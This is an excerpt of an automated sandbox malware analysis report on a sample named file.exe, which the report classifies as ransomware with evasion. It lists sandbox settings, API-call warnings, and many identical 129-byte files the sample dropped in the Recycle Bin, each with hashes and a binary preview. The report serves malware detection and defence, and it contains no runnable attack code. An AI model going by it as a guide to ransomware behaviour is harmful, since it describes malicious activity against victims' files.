00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:732631
                Start date and time:2022-10-28 02:42:11 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 10s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.rans.evad.winEXE@3/1155@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 99.1% (good quality ratio 63.2%)
                • Quality average: 43.6%
                • Quality standard deviation: 39.3%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 58
                • Number of non-executed functions: 6
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, dllhost.exe, printfilterpipelinesvc.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                • Report size getting too big, too many NtReadFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Report size getting too big, too many NtSetValueKey calls found.
                • Report size getting too big, too many NtWriteFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                02:44:51API Interceptor117x Sleep call for process: splwow64.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\$Recycle.Bin\S-1-5-18\AAAAAAAAAAA (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\BBBBBBBBBBB (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\CCCCCCCCCCC (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\DDDDDDDDDDD (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\EEEEEEEEEEE (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\FFFFFFFFFFF (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\GGGGGGGGGGG (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\HHHHHHHHHHH (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\IIIIIIIIIII (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Reputation:low
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\JJJJJJJJJJJ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\KKKKKKKKKKK (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\LLLLLLLLLLL (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\MMMMMMMMMMM (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\NNNNNNNNNNN (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\OOOOOOOOOOO (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\PPPPPPPPPPP (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\QQQQQQQQQQQ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\RRRRRRRRRRR (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\SSSSSSSSSSS (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\TTTTTTTTTTT (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\UUUUUUUUUUU (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\VVVVVVVVVVV (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\WWWWWWWWWWW (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\XXXXXXXXXXX (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\YYYYYYYYYYY (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\ZZZZZZZZZZZ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-18\desktop.ini

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.524755259282443
                Encrypted:false
                SSDEEP:3:3PcMG/PwDIJeXrfZTJjBibGW+dc9lZoFy0eTM1CVL+t:3PcIICLZTJjBi8wkFoTM1CVKt
                MD5:7278124E619E95C636A661B9A4497543
